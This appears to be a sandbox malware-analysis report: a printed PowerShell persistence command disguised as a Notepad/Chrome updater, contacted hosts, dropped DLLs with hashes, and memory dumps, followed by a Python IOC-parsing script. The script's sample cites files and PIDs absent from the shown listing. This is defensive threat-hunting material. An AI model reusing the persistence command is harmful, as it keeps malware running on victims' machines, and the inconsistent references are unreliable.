C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\SysWOW64\schtasks.exe
schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
Network
| KR | 175.119.10.231:80 | aapu.at | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.10.236:80 | 116.203.10.236 | tcp |
| KR | 175.119.10.231:80 | aapu.at | tcp |
| KR | 175.119.10.231:80 | aapu.at | tcp |
| N/A | 127.0.0.1:14066 | tcp | |
| CN | 210.45.148.59:443 | tcp | |
| US | 52.152.110.14:443 | tcp | |
| N/A | 127.0.0.1:1312 | tcp | |
| US | 52.152.110.14:443 | tcp | |
| N/A | 127.0.0.1:14066 | tcp |
Files
memory/2104-580-0x0000000000400000-0x000000000046C000-memory.dmp
C:\ProgramData\14172918970386696495187520
| MD5 | 721d9e468a6d6d0276d8d0e060e4e57b |
| SHA1 | 62c635bf0c173012301f195a7d0e430270715613 |
| SHA256 | 0be20bbaa9d80dfefd3038e5c7904d4b426719607c563254ec42500d704021f0 |
| SHA512 | 0af08f0f5ecda8cdaaaba317f16e835032797e4e6e64f3f4e5b0bb8fd20f1afd9e8e2ca50b549e1c1a48a26ff02f59bc8212deb354b095294c97016a3c9dbb12 |
C:\ProgramData\17224735304539687598034866
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\ProgramData\93277461471471373934209223
| MD5 | 780853cddeaee8de70f28a4b255a600b |
| SHA1 | ad7a5da33f7ad12946153c497e990720b09005ed |
| SHA256 | 1055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3 |
| SHA512 | e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8 |
memory/4728-607-0x0000000000400000-0x000000000046C000-memory.dmp
memory/3436-610-0x0000000000400000-0x0000000000537000-memory.dmp
memory/5048-611-0x00007FF4D9BF0000-0x00007FF4D9CEA000-memory.dmp
memory/3196-615-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1776-619-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Roaming\drsuwfd
| MD5 | da65c7e9f6c37ccbdfe6491fc618806b |
| SHA1 | 0c08ed8113d93487fc58aeeb905362edf908bdfa |
| SHA256 | aefcc8c5f77a200e8d3b91dd2cd46850a1368b987589db45592ae9ab3a79fc31 |
| SHA512 | 71a16dbd66721fde5ab1e03aca9133ee90385139dca36bd377e137118cd92af6a84f717b80d84add8f0698a279acc0101c75e211ae0e3132536bd0ea0cccf19d |
memory/2104-629-0x0000000000400000-0x000000000046C000-memory.dmp
memory/5032-657-0x0000000000400000-0x000000000046C000-memory.dmp
memory/4764-663-0x0000000002D40000-0x00000000033E6000-memory.dmp
memory/1776-667-0x0000000000400000-0x0000000000537000-memory.dmp
memory/5032-683-0x0000000000400000-0x000000000046C000-memory.dmp
memory/4764-686-0x0000000002D40000-0x00000000033E6000-memory.dmp
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\01682208443317506842495130
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
C:\ProgramData\01682208443317506842495130
| MD5 | eaaa6ecca0077542fd37b22b0d11e50d |
| SHA1 | 3b83081897afdadd5f112a449e6d32a0915b8717 |
| SHA256 | adb6fe43ee687f3a5a40882ce49754b23e4d1282c1bbe3c601e43967dfd3ee59 |
| SHA512 | 2080d044fe4c26660ef49ee45e59bcb8bf3e5f0d7917a6c4bce759a5c9f00fd432af3d476ce662ed5d2d0a0a8e6ace578143fc03fdbbfb845378bec305e8d0de |
C:\ProgramData\36245838472322010648574755
| MD5 | c9ff7748d8fcef4cf84a5501e996a641 |
| SHA1 | 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9 |
| SHA256 | 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988 |
| SHA512 | d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73 |
C:\ProgramData\83362397985913541184843072
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\ProgramData\56852877260914447859222211
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\jusched.log
| MD5 | ffee50d4b1b351e210f5ba0730551aed |
| SHA1 | b3baa3fc2d43d7bbc79bc3b8bf3e36177314db4e |
| SHA256 | cb8531d5523199f50d43507f00867215f7657f94be3a521e25b0d5097aa0c87b |
| SHA512 | 1458446e7a34e4d19899e61e9ac9f4fe1160b350b1b7e8686e149a653e71fe49f55a92d9288c5f69f47fbc468171af2a0b1a13fbf1637948ac35cae162bfc7e2 |
memory/4724-772-0x0000026967DC0000-0x0000026967DE2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rsqps3zg.atn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4724-791-0x0000026967D70000-0x0000026967D80000-memory.dmp
memory/4724-792-0x0000026967D70000-0x0000026967D80000-memory.dmp
memory/2104-817-0x0000000000400000-0x000000000046C000-memory.dmp
memory/2840-818-0x00000223E7630000-0x00000223E7640000-memory.dmp
memory/2840-819-0x00000223E7630000-0x00000223E7640000-memory.dmp
memory/2840-821-0x00000223E7630000-0x00000223E7640000-memory.dmp
memory/2840-820-0x00000223E7630000-0x00000223E7640000-memory.dmp
memory/1420-834-0x00000176C0900000-0x00000176C0910000-memory.dmp
memory/1420-835-0x00000176C0900000-0x00000176C0910000-memory.dmp
memory/1420-836-0x00000176C0900000-0x00000176C0910000-memory.dmp
C:\ProgramData\{4CAD6666-6F64-4B8F-AC37-D265C33A8537}\freebl3.dll
| MD5 | 550686c0ee48c386dfcb40199bd076ac |
| SHA1 | ee5134da4d3efcb466081fb6197be5e12a5b22ab |
| SHA256 | edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa |
| SHA512 | 0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e |
C:\ProgramData\{4CAD6666-6F64-4B8F-AC37-D265C33A8537}\MicrosoftInternetExplorer2013Backup.xml
| MD5 | 16fa6bd16573d544916a2cb3335a1f13 |
| SHA1 | 479c5b9375b5b351d7dc217deb159fe92da03f75 |
| SHA256 | 37e639679abd36b5b59324eea7aa1d602ff9c287e5c07dfd335ee1a85b68fc50 |
| SHA512 | 9a871284356b2217fc8dbd568c6731def7781cac4550e77824f5c683b29313cd46e444760413ec730e8f70669ff08b62ab9b73c8099115a71eb84d7d728e2873 |
C:\ProgramData\{4CAD6666-6F64-4B8F-AC37-D265C33A8537}\Urpdpfsaas.tmp
| MD5 | 3857a538209f85f9b1677e010955e2f1 |
| SHA1 | 65b2df9a65b2feae3366b994292faf255348b578 |
| SHA256 | 205164fac68c7a5daaf99ffe944dd6bdc5b4efb4029334b241d2ecc79965bcbf |
| SHA512 | f14e6e50e3789adfb88ed58004574ba8e27ab50deca061d00c7a197eab4dcbea7a43c431f3f1bc26a70ed0c0a10920f577eec1f10c57fe4c936761873a844330 |
C:\ProgramData\{4CAD6666-6F64-4B8F-AC37-D265C33A8537}\C2RManifest.office32mui.msi.16.en-us.xml
| MD5 | ada34b241139f06addc86a9e8d1108f0 |
| SHA1 | 909a92a4e970ae4edcfc365a119d4f4410b0bcf6 |
| SHA256 | 3069814db0a03ed2ce383cb97739d07545d3b67a2b532d9c07d0d5aa3c6a4f3a |
| SHA512 | 2797c6087798660773cfa65f002a4232d75c8b8f787deb12364af683653b41de411ca2de54be1aa86356ba3b6203775c9afaedd513ad33c26f273047f87537a0 |
C:\ProgramData\{4CAD6666-6F64-4B8F-AC37-D265C33A8537}\s640.hash
| MD5 | bef40d5a19278ca19b56fbcdde7e26ef |
| SHA1 | 4f01d5b8de038e120c64bd7cc22cf150af1452fb |
| SHA256 | 7f9c7cc5b265e312fc587d98c7c31218b7a46f1efb8c397dcc329354b4e5831d |
| SHA512 | 5a361b1378c7b9f635e72ffdfba4d59acd17341caba480a5271237a37d40d8eb03a6ca7f3c38e73ce87a15b682d434ffa0a7f96dd6355e286d8213a80518c493 |
C:\ProgramData\{4CAD6666-6F64-4B8F-AC37-D265C33A8537}\MicrosoftLync2013Win64.xml
| MD5 | e3a68bbd204d36868c6f5570e4576675 |
| SHA1 | bc5c44144e8e962c62f7febabdb3d0ba20a8162a |
| SHA256 | 11031974100f363daebe2d5c9e4bf67418d662c73e0341eb71e10b91a33280ac |
| SHA512 | 7c435d9f0e05469979ac3ce3153ad96ac1b01c9946b3df7230b384cc3ed1a2766dfbad0eb00fa1f2105d0fc0e5a87cbc1eb2c6c700c1041ebe4488a6d16c2f02 |
C:\ProgramData\{4CAD6666-6F64-4B8F-AC37-D265C33A8537}\C2RManifest.Proof.Culture.msi.16.es-es.xml
| MD5 | 156b3ab70b2cce134d493104d047e6fa |
| SHA1 | 9907a741812bef8c5b55d0e73c9ac5c0d973c4be |
| SHA256 | 5fba15e64d0ff7075951a8e6bf758d81d4c14fa98e6b8604d5bbc43317da8c01 |
| SHA512 | f3b2157c6aaf1b9e450872057fd5ddaad36bd30be98a48c28c0617c7a638a378dc38cbdbfb9f4b66858b32dfa3e79d577f99fd488b73b6000d1d8887640e7cbd |
C:\Users\Admin\AppData\Local\Temp\Drfday
| MD5 | b13fcb3223116f6eec60be9143cae98b |
| SHA1 | 9a9eb6da6d8e008a51e6ce6212c49bfbe7cb3c88 |
| SHA256 | 961fc9bf866c5b58401d3c91735f9a7b7b4fc93c94038c504c965491f622b52b |
| SHA512 | 89d72b893acd2ec537b3c3deffcc71d1ce02211f9f5b931c561625ee7162052b511e46d4b4596c0a715e1c992310f2536ebdd512db400eeab23c8960ec4d312d |
memory/1492-1023-0x0000000000400000-0x0000000000691000-memory.dmp
memory/1492-1024-0x000001F70D900000-0x000001F70DBA2000-memory.dmp
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll
| MD5 | 2c4e958144bd089aa93a564721ed28bb |
| SHA1 | 38ef85f66b7fdc293661e91ba69f31598c5b5919 |
| SHA256 | b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855 |
| SHA512 | a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6 |
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll
| MD5 | d3074d3a19629c3c6a533c86733e044e |
| SHA1 | 5b15823311f97036dbaf4a3418c6f50ffade0eb9 |
| SHA256 | b1f486289739badf85c2266b7c2bbbc6c620b05a6084081d09d0911c51f7c401 |
| SHA512 | 7dd731fd26085d2a4f3963acd758a42a457e355117b50478bc053180cb189f5f3428806e29d29adfb96370067ff45e36950842de18b658524b72019027be62cf |
memory/1492-1061-0x000001F70D900000-0x000001F70DBA2000-memory.dmp
memory/5032-1093-0x0000000000400000-0x000000000046C000-memory.dmp
memory/1816-1104-0x000001ED31B20000-0x000001ED31DC2000-memory.dmp
memory/1816-1118-0x000001ED31B20000-0x000001ED31DC2000-memory.dmp
memory/4080-1238-0x0000017B2DC40000-0x0000017B2DC50000-memory.dmp
memory/4080-1239-0x0000017B2DC40000-0x0000017B2DC50000-memory.dmp
memory/4080-1240-0x0000017B2DC40000-0x0000017B2DC50000-memory.dmp
memory/4080-1250-0x0000017B48600000-0x0000017B4861C000-memory.dmp
memory/4080-1251-0x0000017B486E0000-0x0000017B486EA000-memory.dmp
memory/4080-1252-0x00007FF487770000-0x00007FF487780000-memory.dmp
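The artifact list above is already in a machine-parsable shape, and two things in it are worth pulling out programmatically rather than by eye. First, `C:\ProgramData\14172918970386696495187520` and `C:\ProgramData\01682208443317506842495130` are each listed twice with different digests: the file was rewritten during the run, so a blocklist built from only one of the two hashes misses the other write. Second, dump regions of identical size at the same base recur across processes (0x400000-0x537000 in PIDs 3660, 3436, 2476, 3196 and 1776; 0x400000-0x46C000 in PIDs 4168, 4728, 2104 and 5032), which is the shape a hunter expects when one payload has been written into several host processes. The parser below is an added example, not part of the sandbox report; it runs on a constructed excerpt of the listing above and assumes the listing contains only three line kinds (dump names, dropped-file paths, and `| ALG | hex |` hash rows).

```python
"""Turn a sandbox artifact listing (dropped-file paths, their hash rows and
memory-dump region names) into hunting IOCs.  Added example, not part of the
original report; it assumes the listing holds only those three line kinds."""
import re
from collections import defaultdict

# Constructed excerpt: the paths, digests and dump names below are copied from
# the report's own artifact list (most MD5/SHA1/SHA512 rows omitted for brevity).
SAMPLE = r"""
memory/3660-458-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\223.exe
| MD5 | 135b751eefe23c858fb1bec740fd7c1b |
| SHA256 | 062326379158ab9a337c352b73a57e6d3465cd26e92ce2247fc502985c9e15b8 |
memory/4168-462-0x0000000000400000-0x000000000046C000-memory.dmp
memory/3436-488-0x0000000000400000-0x0000000000537000-memory.dmp
C:\ProgramData\mozglue.dll
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
C:\ProgramData\14172918970386696495187520
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
memory/2104-580-0x0000000000400000-0x000000000046C000-memory.dmp
C:\ProgramData\14172918970386696495187520
| SHA256 | 0be20bbaa9d80dfefd3038e5c7904d4b426719607c563254ec42500d704021f0 |
memory/1776-619-0x0000000000400000-0x0000000000537000-memory.dmp
C:\ProgramData\nss3.dll
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
"""

DUMP_RE = re.compile(r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
                     r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^\|\s*(?P<alg>MD5|SHA1|SHA256|SHA512)\s*\|\s*(?P<hex>[0-9A-Fa-f]+)\s*\|$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_report(text):
    """Return (files, dumps).  files keeps listing order and keeps a path that
    is listed twice as two records, because that means two distinct writes."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = DUMP_RE.match(line)
        if m:
            start, end = int(m["start"], 16), int(m["end"], 16)
            dumps.append({"pid": int(m["pid"]), "seq": int(m["seq"]),
                          "start": start, "end": end, "size": end - start})
            current = None
            continue
        m = HASH_RE.match(line)
        if m:
            if current is None:
                raise ValueError(f"hash row without a preceding path: {line}")
            alg, digest = m["alg"], m["hex"].lower()
            if len(digest) != HEX_LEN[alg]:  # reject truncated or mangled digests
                raise ValueError(f"bad {alg} length for {current['path']}")
            current["hashes"][alg] = digest
            continue
        current = {"path": line, "hashes": {}}  # any other line starts a file record
        files.append(current)
    return files, dumps


def sha256_iocs(files):
    """Deduplicated SHA256 list for blocklists and retro-hunts."""
    return sorted({f["hashes"]["SHA256"] for f in files if "SHA256" in f["hashes"]})


def rewritten_paths(files):
    """Paths listed more than once with different content: the file was
    overwritten during the run, so hunt on the path, not on a single hash."""
    seen = defaultdict(set)
    for f in files:
        seen[f["path"]].add(f["hashes"].get("SHA256"))
    return {p: sorted(h - {None}) for p, h in seen.items() if len(h - {None}) > 1}


def shared_image_regions(dumps, min_pids=2):
    """Group dump regions by (base, size).  The same base and size in several
    PIDs is the signature of one payload mapped into several processes."""
    groups = defaultdict(set)
    for d in dumps:
        groups[(d["start"], d["size"])].add(d["pid"])
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_pids}


if __name__ == "__main__":
    files, dumps = parse_report(SAMPLE)
    print(len(sha256_iocs(files)), "unique SHA256 IOCs")
    for path, hashes in rewritten_paths(files).items():
        print("rewritten during run:", path, hashes)
    for (base, size), pids in shared_image_regions(dumps).items():
        print(f"region base 0x{base:X} size 0x{size:X} seen in PIDs {pids}")
```

On the excerpt this reports five unique SHA256 values, flags the `14172918970386696495187520` path as rewritten with both digests, and groups the 0x137000-byte region at 0x400000 under PIDs 1776, 3436 and 3660 and the 0x6C000-byte region under 2104 and 4168. Feed it the full listing and the second rewritten path and the remaining PIDs named above fall out the same way; the digest-length check exists because a copy-pasted report commonly loses trailing hex characters, and a short hash silently becomes a useless IOC.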